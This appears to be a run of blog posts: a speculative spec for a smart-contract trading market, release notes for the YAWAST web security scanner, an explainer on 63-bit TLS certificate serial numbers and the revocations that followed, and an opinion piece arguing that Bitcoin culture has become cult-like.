Insane Ideas: Blockchain-Based Automated Investment System

This is part of the Insane Ideas series – a group of blog posts that detail ideas, possible projects, or concepts that may be of interest. These are ideas that I don’t plan to pursue, and are thus available to any and all that would like to do something with them. I hope you find some inspiration – or at least some amusement – in this.

A few months ago I was reading about high-frequency trading (HFT) – algorithms that allow investors to make money essentially out of nothing by executing trades at high speed, and leveraging the natural (and artificial) volatility of the market. While contemplating how HFT could be applied to a blockchain environment, I had an idea that I considered to be equal parts brilliant and insane (as described to a friend of mine):

A blockchain/smart contract based market; functioning similar to a stock market, but instead of holding shares in a company, you hold shares of a contract. Contracts will automatically trade in shares of other contracts to generate profit; contracts that perform well will have more demand, and thus be worth more.

Rules limit the maximum time a contract can hold shares and a requirement that a contract hold at least N% of its value in shares of other contracts will ensure constant trading activity. Each contract is essentially a HFT system trading against all the other contracts.

With the ability to trade options on other contracts, it would produce a very dynamic market that exists for the sole purpose of making money.

This is a market that is intended to be volatile, constantly changing, with new smart contracts being created and closed frequently. There would be immense pressure to create ever more sophisticated contracts that can outperform the competition. This rapid evolution would allow those that choose well to make a substantial profit. Of course, those that pick their investments poorly will find losses mounting up very quickly.

This is, simply put, crazy. It’s a very high risk / high reward system that is designed for investors that are willing to take substantial risks – though the upside could also be substantial.

This project became something of a thought experiment, and what follows is the start of a high-level specification for this system. This isn’t complete, but it could have some value to someone – it has no value sitting unseen in my notes.

Please note: The following contains opinions on legal matters. I am not an attorney, nor is this legal advice. Please consult with an attorney should you decide to pursue a concept like this, as it’s highly likely that they will have many opinions that you should listen to.


This document describes a novel blockchain-based investment system, designed to provide a fair market using smart contracts that engage in automated trading. These smart contracts issue shares, allowing investors to profit from their performance.

The network uses a hybrid centralized-decentralized approach to achieve the level of performance needed for rapid trading activity. Using a truly decentralized approach is likely not possible for a variety of reasons, though pursuing such a design would present some novel problems that are worthy of future research.


This document uses the following definitions throughout.

Coin – This is the “currency” of the system, used to purchase shares from contracts, and used by contracts to purchase shares of other contracts. Coin is issued by a special contract, and is a Network Token, no different than the tokens that represent shares of a contract.

Network Token – This is a token that represents value in the network; it may represent Coin, or shares of a contract. Each token includes the identification of the contract that it originates from.

Potential Legal / Tax Issues

Securities – It’s possible that the contract shares could be seen by the SEC as a security. This would need to be reviewed by an expert in this area of law to determine what compliance steps would be needed.

Capital Gains – The tax implications of this type of trading aren’t clear. This will need to be reviewed to determine the tax consequences of this design and how best to handle them.

Block Generator

The Block Generator is a system elected from among the Block Signers that is responsible for collecting Commitments from the network and producing a new block every blockGenerationTime seconds. The Commitments will be added to a block and signed by the Block Generator, which will then send the new block to each of the Block Signers for their signatures. Each Block Signer will return their signature of the block. The Block Generator will then broadcast the new block to the network.

The Block Generator will only publish blocks that have at least blockMinimumSigners signatures, excluding its own. The Block Generator SHOULD publish a block as soon as it has received enough signatures to satisfy the blockMinimumSigners requirement.
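The publishing rule above reduces to a simple check. A minimal sketch – the function name and signature are illustrative assumptions, not part of any spec:

```python
def ready_to_publish(signatures, generator_id, block_minimum_signers):
    """True once the block carries at least blockMinimumSigners
    signatures, excluding the Block Generator's own signature."""
    external = [s for s in signatures if s != generator_id]
    return len(external) >= block_minimum_signers
```

Per the SHOULD above, the Block Generator would publish as soon as this first returns true, rather than waiting for all signers.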

Given the importance of quickly producing blocks to the system, the Block Generator should be a highly redundant system, resilient to common disruptions.

Block Generation Reward

Given the critical role that the Block Generator and the other Block Signers play, a reward is issued on the creation of each block. When a new block is created, the Coin Contract will mint new Coin, and distribute it evenly among those that signed the block, including the Block Generator.

No reward is generated for special purpose blocks.
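The reward logic can be sketched as follows, assuming Coin amounts divide evenly among signers; names are illustrative only:

```python
def block_reward_shares(signers, block_production_reward, special_purpose=False):
    """Distribute the newly minted blockProductionReward evenly among all
    block signers (Block Generator included); special purpose blocks
    generate no reward."""
    if special_purpose or not signers:
        return {}
    share = block_production_reward / len(signers)
    return {signer: share for signer in signers}
```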

Operating Fees

To ensure the continued health of the network, there are certain operating fees that are charged to each contract on a weekly basis. These fees are a percentage of the total value of the contract, and defined in the Network Parameters. These fees are:

Network Operator Fee – To cover the cost of operating and scaling the underlying network.

Coin Contract Operator Fee – To cover the administrative, security, and other costs of maintaining the contract configuration and protecting the assets held by the contract.

Founders Fee – This fee is paid to the founders of the network, to enable them to recover development costs, and continue to invest in improving the network.

These fees are payable via Coin or shares of the contract they are charged against. All contracts, other than the Coin Contract and Closed contracts must pay these fees. If multiple addresses are listed for any fee, the payment MUST be split evenly between these addresses.
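A sketch of one weekly fee charge, assuming fee rates are decimal fractions of contract value as defined in the Network Parameters; the even split across multiple addresses follows the MUST above:

```python
def weekly_fee_payments(contract_value, fee_rate, fee_addresses):
    """Charge fee_rate (a decimal fraction of total contract value) for one
    week, splitting the payment evenly between the listed fee addresses."""
    total_fee = contract_value * fee_rate
    per_address = total_fee / len(fee_addresses)
    return {address: per_address for address in fee_addresses}
```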

Network Parameters

Multiple items in the investment contracts and other network components refer to agreed upon configuration items. These items will be retrieved from the most recent Network Parameters special block. This block will contain a single record containing a JSON document which defines all parameters needed for the network to function.

These values include:

  1. blockGenerationTime (in seconds)
  2. blockGenerator (public key & address, 1 item)
  3. blockSigners (public key & address, multiple items)
  4. blockMinimumSigners (int, must be less than the number of blockSigners)
  5. blockProductionReward (int)
  6. contractMinimumSharePrice (int, in Coin)
  7. contractMaximumShareHoldTime (in seconds)
  8. contractMinimumShareHoldTime (in seconds)
  9. contractMaximumManagerFee (percentage of contract value, decimal)
  10. contractMaximumManagerShare (percentage of contract share, decimal)
  11. contractNetworkOperatorFee (percentage of contract value, decimal)
  12. contractNetworkOperatorFeeAddress (address list)
  13. contractFoundersFee (percentage of contract value, decimal)
  14. contractFoundersFeeAddress (address list)
  15. contractCoinContractOperatorFee (percentage of contract value, decimal)
  16. contractCoinContractOperatorFeeAddress (address list)
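One plausible shape for the JSON document, built here as a Python dict; every key comes from the list above, but the values and the validation check are illustrative assumptions:

```python
import json

network_parameters = {
    "blockGenerationTime": 10,
    "blockGenerator": {"publicKey": "pk-gen", "address": "addr-gen"},
    "blockSigners": [
        {"publicKey": "pk-1", "address": "addr-1"},
        {"publicKey": "pk-2", "address": "addr-2"},
        {"publicKey": "pk-3", "address": "addr-3"},
    ],
    "blockMinimumSigners": 2,
    "blockProductionReward": 100,
    "contractMinimumSharePrice": 1,
    "contractMaximumShareHoldTime": 86400,
    "contractMinimumShareHoldTime": 60,
    "contractMaximumManagerFee": 0.02,
    "contractMaximumManagerShare": 0.10,
    "contractNetworkOperatorFee": 0.001,
    "contractNetworkOperatorFeeAddress": ["addr-netop"],
    "contractFoundersFee": 0.001,
    "contractFoundersFeeAddress": ["addr-founders"],
    "contractCoinContractOperatorFee": 0.001,
    "contractCoinContractOperatorFeeAddress": ["addr-coinop"],
}

def validate(params):
    # The parameter list requires blockMinimumSigners < number of blockSigners.
    assert params["blockMinimumSigners"] < len(params["blockSigners"])
    return json.dumps(params)
```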

A new Network Parameters block may be generated by any Block Signer, and must be signed by blockMinimumSigners, excluding the Block Signer that generated the block. Should the Block Generator become unavailable, the Block Signers MUST elect a new Block Generator, and produce a new Network Parameters block.


All contracts are immutable, and may not be changed, amended, or otherwise altered once they are created. While not allowing updates does complicate the situation should a vulnerability be discovered, it is the only way to ensure that a contract can not be updated in a way that would enable fraudulent activity once it has established value.

All contract code will be included in the special purpose block that creates the contract, making the source code public. Portions of the code, including the code that processes the New Block Action, may be encrypted using a key available to the Contract Execution Servers, provided that the Contract Manager provides a code review report from an approved security vendor to the public, and requests approval from operators of all Block Signers. The Block Signer operators may approve or reject the request at their discretion. Partially encrypted contracts are allowed to protect sensitive strategy information that may be critical to contract performance.

When a contract is created, it defines a certain number of shares, which it will initially own all of. It is not possible for a contract to issue additional shares, or to perform stock splits, or reverse splits. The number of existing shares is immutable.

Contracts have four states that they may exist in:

Active – Contract is live, and may engage in normal activity.

Restricted – A contract may be placed in a Restricted state, meaning that no activity is permitted. The New Block Action will not be executed, and the contract will not be permitted to sell shares of itself, buy shares, or otherwise engage in normal trading. A contract may be Restricted, or have its state changed back to Active, by a special purpose block. The purpose of this state is to minimize risk should a vulnerability be discovered. In the Restricted state, the Contract Manager may opt to close the contract by changing its state to Closing.

Closing – When a contract state is changed to Closing, the contract will begin a shutdown process, liquidating its assets and halting its normal trading activity. Once a contract has been placed in Closing, it can not be changed back to Active. When the contract has liquidated all assets, holding only Coin and its own shares, it will move to the Closed status.

Closed – When a contract enters the Closed state, which is only possible by going through the Closing state, the contract will issue a Repurchase transaction for all outstanding shares, and cease all activity. The contract distributes all Coin it holds via the Repurchase; when completed, it will hold only shares of itself.

Closing A Contract

At the end of the life of a contract, the holder of the contract’s private key SHALL trigger the contract to close. When a contract is closed, the following actions are taken:

  1. The contract stops all direct sales of its own shares, if any are remaining.
  2. The contract stops all purchases of shares using its own shares as the currency (Share Swapping).
  3. The contract stops all purchases using Coin as the currency.
  4. The contract sells shares in other contracts only for Coin.
  5. When all assets have been sold, the contract will issue a Repurchase transaction for all outstanding shares, calculating the price based on total Coin held divided by the number of outstanding shares.
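Step 5’s price calculation is a simple division; a minimal sketch:

```python
def repurchase_price(total_coin_held, outstanding_shares):
    """Final Repurchase price when a contract closes: total Coin held
    divided by the number of outstanding shares (fractional shares are
    allowed, so this is ordinary division)."""
    return total_coin_held / outstanding_shares
```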

Contract Execution

All contracts will be executed via Contract Execution Servers that are operated by the Network Operator.

Purchasing Contract Shares

Contract shares may be purchased via an exchange, or from the contract directly. Shares purchased from the contract have a minimum price of contractMinimumSharePrice per full share; this is to ensure that new contracts are able to gain adequate funding to operate.

Shares of a contract may be purchased either as full shares (1.0 share), or as a fractional share.

The Coin Contract

The Coin Contract is a special purpose contract that backs all Coin issued within the system. It acts as the value store backing Coin, receiving payments in cryptocurrencies, and returning new Coin in exchange. The Coin Contract will also repurchase Coin, transferring cryptocurrency for Coin received; Coin received via this system will be burned and removed from circulation.

The Coin Contract acts much like a regular contract from a functional perspective, except that it is the only contract that is able to produce new tokens beyond those created when the contract was created.

Coin is created via two mechanisms:

  1. Direct Purchase – When Coin is purchased from the Coin Contract via another currency, new Coin is produced.
  2. Block Generation Reward – When a new block is generated, new Coin is produced as a reward and to cover operations expense for the system operators.

The Coin Contract operator SHALL choose which cryptocurrencies are accepted, and which, if any, are thereafter converted to another cryptocurrency. The Coin Contract may not hold any reserves in Coin, or any other tokens from this network; all value must be stored in an outside value store.

The Coin Contract will use multiple sources of data, whenever possible, to determine the appropriate exchange rates.

Coin Contract Operator

As the Coin Contract holds value outside of the system, it must have an operator that is responsible for the security of its holdings, and updating its configuration. This operator should be a distinct legal entity, with oversight that is independent from the rest of the system.

The Coin Contract Operator SHOULD publish regular reports listing the status of the accounts held for the Coin Contract, and engage with a reputable auditor to provide assurance that the funds are secured.

The Coin Contract Operator SHOULD place funds in excess of what is needed for the Coin Contract to operate for 30 days with a fully independent custodian, such as a regulated financial institution.

Funds held for the Coin Contract MUST NOT be used for operating or other expenses by any party.

Contract Manager

The Contract Manager is the party that holds the private key for a contract, allowing them to update the contract’s configuration and change the state to Closing.

The Contract Manager MAY charge a fee against the contract, based on a percentage of total value, up to contractMaximumManagerFee. Any fee specified by the contract that exceeds contractMaximumManagerFee will be reduced to contractMaximumManagerFee.

Upon creation of a contract, the Contract Manager MAY receive shares automatically from the contract, based on a percentage of total shares, not to exceed contractMaximumManagerShare. The Contract Manager may purchase additional shares through the normal mechanism and at market rates.
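Both caps reduce to simple clamping against the Network Parameters; a sketch, with illustrative names:

```python
def effective_manager_fee(requested_fee, max_fee):
    """Any fee above contractMaximumManagerFee is reduced to the cap."""
    return min(requested_fee, max_fee)

def initial_manager_shares(total_shares, requested_fraction, max_fraction):
    """Shares granted to the Contract Manager at creation, capped at
    contractMaximumManagerShare (a fraction of total shares)."""
    return total_shares * min(requested_fraction, max_fraction)
```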

Network Operator

The network operator is responsible for maintaining the components of the system that can not be decentralized while maintaining the level of performance required.

The Network Operator SHALL operate a number of Contract Execution Servers sufficient to process all contracts with minimal delay after a new block is broadcast.

The Network Operator SHALL operate a public exchange, with minimal fees, supported by the Network Operator Fee, to allow users to easily buy, sell, and trade Coin and contract shares.

The Network Operator SHALL employ reasonable security measures for all systems they operate for the network.

If the Network Operator also operates Block Signers, the number of Block Signers they operate MUST be less than 50% of blockMinimumSigners to minimize the risk that the Network Operator is able to perform fraudulent activity.

YAWAST v0.7 Released

It has now been over a year since the last major release of YAWAST, but today I am happy to release version 0.7, one of the largest changes to date. This is the result of substantial effort to ensure that YAWAST continues to be useful in the future, and to add as much value as possible for those performing security testing of web applications.

If you are using the Gem version, simply run gem update yawast to get the latest version.

JSON Output

One of the headline features is that YAWAST now supports producing JSON output via the new --output=<file> parameter. This will create a JSON file that can be used to record the actions of YAWAST in more detail, and be used in reporting automation. The goal of this feature is to capture all of the information that is needed to produce a report automatically.

If you specify --output=. or --output=/path/., YAWAST will automatically generate a file name based on the domain name and current time.

The overall structure of the JSON output shouldn’t change, but the details included may change over time as the output is refined to make it as useful as possible.

Enhanced Vulnerability Scanner

The other major change in this version is the new vulnerability scanner, which adds a number of new checks, and opens the door to more easily adding checks in the future. This is currently accessed via the --vuln_scan parameter, as this is seen as a beta-level feature; when used without that parameter, YAWAST behaves as it has in the past. In the future, this will become the default behavior, once it’s clear that it is stable.

It is recommended that you use --vuln_scan unless it is causing issues for you (and if it does cause issues, please open an issue).

One behavioral change is that the new --spider option works differently in each mode; --vuln_scan will always spider the site, so in that mode, --spider simply adds printed output to the UI listing the URLs found.

This new scanner leverages Chrome via an automated interface to perform certain tasks that can only be properly tested through browser interaction; this adds some new dependencies, though the application should fail gracefully if they aren’t present.

The YAWAST Docker image has been updated to work with this new feature, making it the easiest way to use it.

User Enumeration via Password Reset Form (Timing & Response)

One new experimental feature that I would like to point out is that YAWAST will attempt to use the target application’s Password Reset Form (specified via --pass_reset_page) using Chrome automation to capture the difference between a valid user (specified via --user) and a randomly generated invalid user. It will compare the responses and display a diff of the changes between the two.

YAWAST will attempt to automatically identify the form field that captures the username / email address; if it fails to find the field, it will prompt you to provide the name or id.

It will run this procedure a total of 5 times, capturing the timing of each request, to determine if timing information can be used to identify valid users.
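The idea behind the timing comparison can be sketched as follows; `measure` stands in for the Chrome-driven form submission and is a hypothetical callback, not YAWAST’s actual API:

```python
import statistics

def timing_delta(measure, valid_user, invalid_user, runs=5):
    """Submit the password reset form `runs` times for each username via the
    caller-supplied measure() function (which returns elapsed seconds) and
    compare median response times; a large gap suggests user enumeration."""
    valid_times = [measure(valid_user) for _ in range(runs)]
    invalid_times = [measure(invalid_user) for _ in range(runs)]
    return statistics.median(valid_times) - statistics.median(invalid_times)
```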

Change Log

Here is a list of the changes included in this version:

  • #38 – JSON Output Option via --output= (work in progress)
  • #133 – Include a Timestamp In Output
  • #134 – Add options to DNS command
  • #135 – Incomplete Certificate Chain Warning
  • #137 – Warn on TLS 1.0
  • #138 – Warn on Symantec Roots
  • #139 – Add Spider Option
  • #140 – Save output on cancel
  • #141 – Flag --internalssl as Deprecated
  • #147 – User Enumeration via Password Reset Form
  • #148 – Added --vuln_scan option to enable new vulnerability scanner
  • #151 – User Enumeration via Password Reset Form Timing Differences
  • #152 – Add check for 64bit TLS Cert Serial Numbers
  • #156 – Check for Rails CVE-2019-5418
  • #157 – Add check for Nginx Status Page
  • #158 – Add check for Tomcat RCE CVE-2019-0232
  • #161 – Add WordPress WP-JSON User Enumeration
  • #130 – Bug: HSTS Error leads to printing HTML
  • #132 – Bug: Typo in SSL Output
  • #142 – Bug: Error In Collecting DNS Information

TLS: 64bit-ish Serial Numbers & Mass Revocation

During a recent discussion about the DarkMatter CA on a Mozilla mailing list, it was found that their 64-bit serial numbers weren’t actually 64 bits, and it opened a can of worms. It turns out that the serial number was effectively 63 bits, which is a violation of the CA/B Forum Baseline Requirements that state it must contain 64 bits of output from a secure random number generator (CSPRNG). As a result of this finding, 2,000,000 certificates or more may need to be replaced by Google, Apple, GoDaddy and various others.

Update: GoDaddy initially said that more than 1.8 million of their certificates were impacted; they drastically reduced this number in an update posted on 2019-03-12. The full number of certificates impacted by this is still being discussed.

It’s quite likely that the full scope of this problem hasn’t been determined yet.

The Problem

During an analysis of certificates issued by DarkMatter, it was found that they all had a length of exactly 64 bits – not more, not less. If there’s a rule that requires 64 bits of CSPRNG output, and the serial number is always 64 bits, at first glance this seems fine. But, there’s a problem, and it’s in RFC 5280; it specifies the following:

The serial number MUST be a positive integer assigned by the CA to each certificate. It MUST be unique for each certificate issued by a given CA (i.e., the issuer name and serial number identify a unique certificate). CAs MUST force the serialNumber to be a non-negative integer.

Requiring a positive integer means that the high bit can’t be set – if it is set, the value can’t be used directly as a certificate serial number. As such, if the high bit is set, there are two[1] possible options:

  1. Pad the serial with an additional byte, so that the full 64 bits of output is used.
  2. Discard the value, and try again until you get a value without the high bit set. This means that the size is always 64 bits, and the high bit is always 0 – giving you 63 effective bits of output.
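The two strategies, and the entropy they retain, can be demonstrated in a few lines (a sketch; real CA software works on DER-encoded integers, not Python ints):

```python
import secrets

def serial_pad():
    """Strategy 1: keep all 64 random bits; if the high bit is set, the DER
    encoder pads with a leading zero byte so the integer stays positive."""
    return secrets.randbits(64)  # all 64 bits of entropy survive

def serial_retry():
    """Strategy 2 (the EJBCA behavior described above): redraw until the
    high bit is clear - always 64 bits long, but only 63 effective bits."""
    while True:
        value = secrets.randbits(64)
        if value < 2**63:  # high bit unset
            return value

# The halving is exactly 2^63 values lost:
assert 2**64 - 2**63 == 9_223_372_036_854_775_808
```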

EJBCA, a popular software package for CAs, defaulted to 64-bit serial numbers and used the second strategy for dealing with CSPRNG output that has the high bit set. This means that instead of using the full 64-bit output, it effectively reduced it to 63 bits – cutting the number of possible values in half. When we are talking about numbers this large, it’s easy to think that 1 bit wouldn’t make much difference, but the difference between 2^64 and 2^63 is substantial – to be specific, they differ by 2^63, or 9,223,372,036,854,775,808.

The strategy of calling the CSPRNG until you get a value that has the high bit unset violates the intention of the rule imposed by the Baseline Requirements, meaning that all certificates issued using this method were mis-issued. This is a big deal, at least for a few CAs and their customers.

Now, the simple solution to this is to just increase the length of the serial beyond 64 bits; for CAs that used 72 or more bits of CSPRNG output, this is a non-issue, as even if they coerce the high bit, they are still well above the 64-bit minimum. This is a clear case of following a standard as close to the minimum as possible, which left no margin for error. As the holders of those 2+ million certificates are learning, they cut it too close.

The Rule

The Baseline Requirements are the minimum rules[2] that all CAs must follow; these rules are voted on by a group of browser makers and CAs, and often debated in detail. Thankfully for all involved, many of these discussions happen on public mailing lists, so it’s easy to see what was discussed and what the views of the different parties were when a change was approved. This is a good thing when it comes to understanding this issue.

The relevant rule in this case is in section 7.1:

Effective September 30, 2016, CAs SHALL generate non-sequential Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.

On a prima facie reading of this requirement, it appears that the technique EJBCA used could be valid – it is the output of a CSPRNG, and it is 64 bits. However, the Baseline Requirements can’t be read so simply; you have to look deeper to find the full intention. In this case, the fact that 1 bit would be lost in a purely random serial was pointed out by Ryan Sleevi of Google and Ben Wilson of DigiCert. This fact is not pointed out in the requirement itself, but is available to anyone that spends a few minutes looking at the history[3] of the requirement.

With a deeper reading, it’s clear that a 64-bit serial, the smallest permitted, is quite likely to be a violation of the Baseline Requirements. While you can’t look at a single certificate to determine this, looking at a larger group will reveal whether the certificate serial numbers are consistently 64 bits, in which case there could be a problem.

Mass Revocation

When a certificate is issued that doesn’t meet the Baseline Requirements, the issuing CA is required to take quick action. Once again, we look to the Baseline Requirements to find guidance:

The CA SHOULD revoke a certificate within 24 hours and MUST revoke a Certificate within 5 days if one or more of the following occurs: … 7. The CA is made aware that the Certificate was not issued in accordance with these Requirements or the CA’s Certificate Policy or Certification Practice Statement; …

This makes it clear that the CA has to revoke any certificate that wasn’t properly issued within 5 days. As a result, CAs are under pressure to address this issue as quickly as possible – replacing and revoking certificates with minimal delay to avoid missing this deadline. Google was able to revoke approximately 95% of their mis-issued certificates within the 5 days, Apple announced that they wouldn’t be able to complete the process within 5 days, and GoDaddy stated that they would need 30 days to complete the process. The same reason was cited by all three: minimizing impact. Without robust automation[4], changing certificates can be complex and time-consuming, leaving the CA to choose between complying with requirements or impacting their customers.

Failing to comply with the Baseline Requirements will complicate audits, and could put a CA at risk of being removed from root stores.

The Impact

The full impact of this issue is far from known. For Google and Apple, both in the process of replacing their mis-issued certificates, the certificates were only issued to their own organizations – reducing the impact. On the other hand, GoDaddy, which has mis-issued more than 1.8 million certificates[5], is facing a much larger problem, as these were certificates issued to customers – customers that are likely managing their certificates manually, and will require substantially longer to complete the process.

It’s also not clear how many other CAs may be impacted by this issue; while a few have come forward, I would be shocked if this is the full list. This is likely an issue that will live on for some time.

[Note on DarkMatter: This post is solely about the issue with serial numbers discovered as a result of the discussion around DarkMatter operating as a trusted CA in the Mozilla root store. It does not take any position on the issue of DarkMatter being deserving of such trust, which is left as an exercise for the reader.]

[Note on Exploitation Risk: Entropy in the serial number is required as a way to prevent hash collisions from being used to forge certificates; this requires an ability to predict or control certificate contents and the use of a flawed hashing algorithm, and adding a random value makes this more difficult. This type of issue has been exploited with MD5, and could someday be exploited with SHA1; there are no known flaws in the SHA2 family (used in all current end-entity certificates) that would allow such an attack. In addition, while this issue reduces the level of protection by half, 2^63 is still a large number and provides a substantial safety margin.]

  1. There may be additional ways of handling this situation, though these are the most likely. Other methods may or may not actually be compliant with the Baseline Requirements. 
  2. Root store programs have their own rules which CAs must follow that go beyond the Baseline Requirements (BRs); as such, the BRs are not the final word in what is required, but a set of minimum requirements that all involved have agreed to. 
  3. Given the complex and sometimes adversarial nature of the CA/B Forum, even small and obvious changes are sometimes debated for extended periods. This makes updating the BRs more complex than it should be, and appears to drive changes to be as minimal as possible to avoid conflict. In an ideal world, CA/B Forum would produce an annotated version of the BRs that offer additional insight into the rules, their origins, and their intentions. In the world we live in, that would require a level of cooperation and coordination that is exceedingly unlikely. 
  4. With events like this, Heartbleed, and others that can lead to certificates being revoked with short notice, using robust automation to manage certificates is the only logical way forward. While this makes some people uncomfortable, manual management exposes organizations to far greater risk. 
  5. At the time of writing, these are preliminary numbers; the number of certificates that are being reissued is not clear. 

Bitcoin is a Cult

The Bitcoin community has changed greatly over the years; from technophiles that could explain a Merkle tree in their sleep, to speculators driven by the desire for a quick profit and blockchain startups seeking billion-dollar valuations, led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies, driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and that cryptocurrencies will fundamentally change the world’s economy.

Every year, their ranks grow, and their perception of cryptocurrencies becomes more grandiose, even as novel uses of the technology bring it to its knees. While I’m a firm believer that a well designed cryptocurrency could ease the flow of money across borders, and provide a stable option in areas of mass inflation, the reality is that we aren’t there yet. In fact, it’s the substantial instability in value that allows speculators to make money. Those that preach that the US Dollar and Euro are on their deathbed have utterly abandoned an objective view of reality.

A little background…

I read the Bitcoin white-paper the day it was released – an interesting use of Merkle trees to create a public ledger and a fairly reasonable consensus protocol – and it got the attention of many in the cryptography sphere for its novel properties. In the years since that paper was released, Bitcoin has become rather valuable, attracted many that see it as an investment, and gained a loyal (and vocal) following of people who think it’ll change everything. This discussion is about the latter.

Yesterday, someone on Twitter posted the hash of a recent Bitcoin block; the thousands of Tweets and other conversations that followed have convinced me that Bitcoin has crossed the line into true cult territory.

It all started with this Tweet by Mark Wilcox:

The value posted is the hash of Bitcoin block #528249. The leading zeros are a result of the mining process; to mine a block you combine the contents of the block with a nonce (and other data), hash it, and it has to have at least a certain number of leading zeros to be considered valid. If it doesn’t have the correct number, you change the nonce and try again. Repeat this until the number of leading zeros is the right number, and you now have a valid block. The part that people got excited about is what follows, 21e800.
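The loop described above looks roughly like this toy version (real Bitcoin double-SHA-256 hashes an 80-byte block header against a full difficulty target; this sketch only shows the retry-until-enough-zeros structure):

```python
import hashlib

def mine(block_contents: bytes, difficulty_bits: int):
    """Hash the block contents plus an incrementing nonce until the digest
    starts with at least difficulty_bits zero bits, then return the winning
    nonce and the hex digest."""
    nonce = 0
    while True:
        digest = hashlib.sha256(block_contents + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(digest, "big") >> (256 - difficulty_bits) == 0:
            return nonce, digest.hex()
        nonce += 1
```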

Some are claiming this is an intentional reference, that whoever mined this block actually went well beyond the current difficulty to not just bruteforce the leading zeros, but also the next 24 bits – which would require some serious computing power. If someone had the ability to bruteforce this, it could indicate something rather serious, such as a substantial breakthrough in computing or cryptography.

You must be asking yourself what's so important about 21e800 – a question you would surely regret asking. Some claim it's a reference to E8 Theory (a widely criticized paper proposing a unified field theory), or to the 21,000,000 total Bitcoins that will eventually exist (despite the fact that 21 x 10^8 would be 2,100,000,000). There are other theories, too crazy to write about here. Another important fact: a block whose hash has 21e8 following the leading zeros is mined roughly once a year on average (about 52,560 blocks are mined per year, and any given four-hex-digit sequence has a 1-in-65,536 chance of appearing) – and those blocks were never seen as anything important.

This leads to where things get fun: the theories that are circulating about how this happened.

  • A quantum computer that is somehow able to hash at unbelievable speed. This is despite the fact that there's no indication in the theory of quantum computing that they'll ever be able to do this; hashing is one of the things considered relatively safe from quantum computers (Grover's algorithm offers at best a quadratic speed-up, nowhere near enough).
  • Time travel. Yes, people are actually saying that someone came back from the future to mine this block. I think this is crazy enough that I don’t need to get into why this is wrong.
  • Satoshi Nakamoto is back. Despite the fact that there has been no activity with Satoshi's private keys, some theorize that he has returned and is somehow able to do things nobody else can. These theories don't explain how.

If all this sounds like numerology to you, you aren’t alone.

All this discussion around special meaning in block hashes also reignited discussion of something that is, at least somewhat, interesting. The Bitcoin genesis block – the first Bitcoin block – does have an unusual property: the early Bitcoin blocks required that the first 32 bits of the hash be zero, yet the genesis block has 43 leading zero bits. As the code that produced the genesis block was never released, it's not known how it was produced, nor what type of hardware was used. Satoshi had an academic background, so may have had access to more substantial computing power than was common at the time via a university. At this point, the oddities of the genesis block are a historical curiosity, nothing more.

A brief digression on hashing

This hullabaloo started with the hash of a Bitcoin block, so it's important to understand just what a hash is, and to understand one very important property hashes have. A hash is a one-way cryptographic function that creates a pseudo-random output based on the data it's given.

What this means, for the purposes of this discussion, is that for each input you get an effectively random output. Random numbers have a way of sometimes looking interesting, simply as a result of being random and of the human brain's affinity for finding order in everything. When you start looking for order in random data, you will find interesting things – things that are nevertheless meaningless, because the data is simply random. When people ascribe significant meaning to random data, it tells you far more about the mindset of those involved than about the data itself.
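A quick way to convince yourself of this is to hash two nearly identical inputs and compare the results. This sketch uses SHA-256 (the hash Bitcoin applies, twice, during mining); the inputs are arbitrary strings chosen for illustration:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class HashDemo {
    // SHA-256 of a string, rendered as lowercase hex.
    static String sha256Hex(String s) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256")
                .digest(s.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) hex.append(String.format("%02x", b));
        return hex.toString();
    }

    public static void main(String[] args) throws Exception {
        // Inputs differing by a single character produce unrelated digests.
        System.out.println(sha256Hex("block 528249"));
        System.out.println(sha256Hex("block 528250"));
    }
}
```

The two digests share no meaningful relationship; any "interesting" substring that happens to appear in one of them is pure coincidence.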

Cult of the Coin

First, let us define a couple of terms:

  • Cult: a system of religious veneration and devotion directed toward a particular figure or object.
  • Religion: a pursuit or interest to which someone ascribes supreme importance.

The Cult of the Coin has many saints, perhaps none greater than Satoshi Nakamoto, the pseudonym used by the person(s) that created Bitcoin. He is vigorously defended, ascribed ability and understanding far above that of a normal researcher, and seen as a visionary beyond compare who is leading the world to a new economic order. Combined with Satoshi's secretive nature and unknown true identity, adherents of the Cult view Satoshi as a truly venerated figure.

That is, of course, with the exception of adherents that follow a different saint, who is unquestionably correct, and any criticism is seen as not only an attack on their saint, but on themselves as well. Those that follow EOS, for example, may see Satoshi as a hack that developed a failed project, yet will react fiercely to the slightest criticism of EOS – a reaction so strong it's normally reserved for an attack on one's deity. Those that follow IOTA react with equal fierceness; and there are many others.

These adherents have abandoned objectivity and reasonable discourse, and allowed their zealotry to cloud their vision. Any discussion of these projects and the people behind them that doesn’t include glowing praise inevitably ends with a level of vitriolic speech that is beyond reason for a discussion of technology.

This is dangerous, for many reasons:

  • Developers & researchers are blinded to flaws. Thanks to the vast quantities of praise from adherents, those involved develop a grandiose view of their own abilities and begin to view criticism as unjustified attacks – because they couldn't possibly be wrong.
  • Real problems are attacked. Instead of technical issues being seen as problems to be solved and opportunities to improve, they are seen as attacks from people who must be motivated to destroy the project.
  • One coin to rule them all. Adherents are often aligned to one, and only one, saint. Acknowledging the qualities of another project means acceptance of flaws or deficiencies in their own, which they will not do.
  • Preventing real progress. Evolution is brutal: it requires death, it requires projects to fail and the reasons for those failures to be acknowledged. If the lessons from failure are ignored, if things that should die aren't allowed to, progress stalls.

Discussions around many of the cryptocurrencies and related blockchain projects are becoming more and more toxic, making it impossible for well-intentioned people to have real technical discussions without being attacked. Discussions of real flaws – flaws that would doom a design in any other environment – are routinely treated as heresy, without any analysis to determine whether the claims are factual; as a result, the cost for the well-intentioned to get involved has become extremely high. There are at least some people aware of significant security flaws who have opted to remain silent due to this highly toxic environment.

What was once driven by curiosity, a desire to learn and improve, to determine the viability of ideas, is now driven by blind greed, religious zealotry, self-righteousness, and self-aggrandizement.

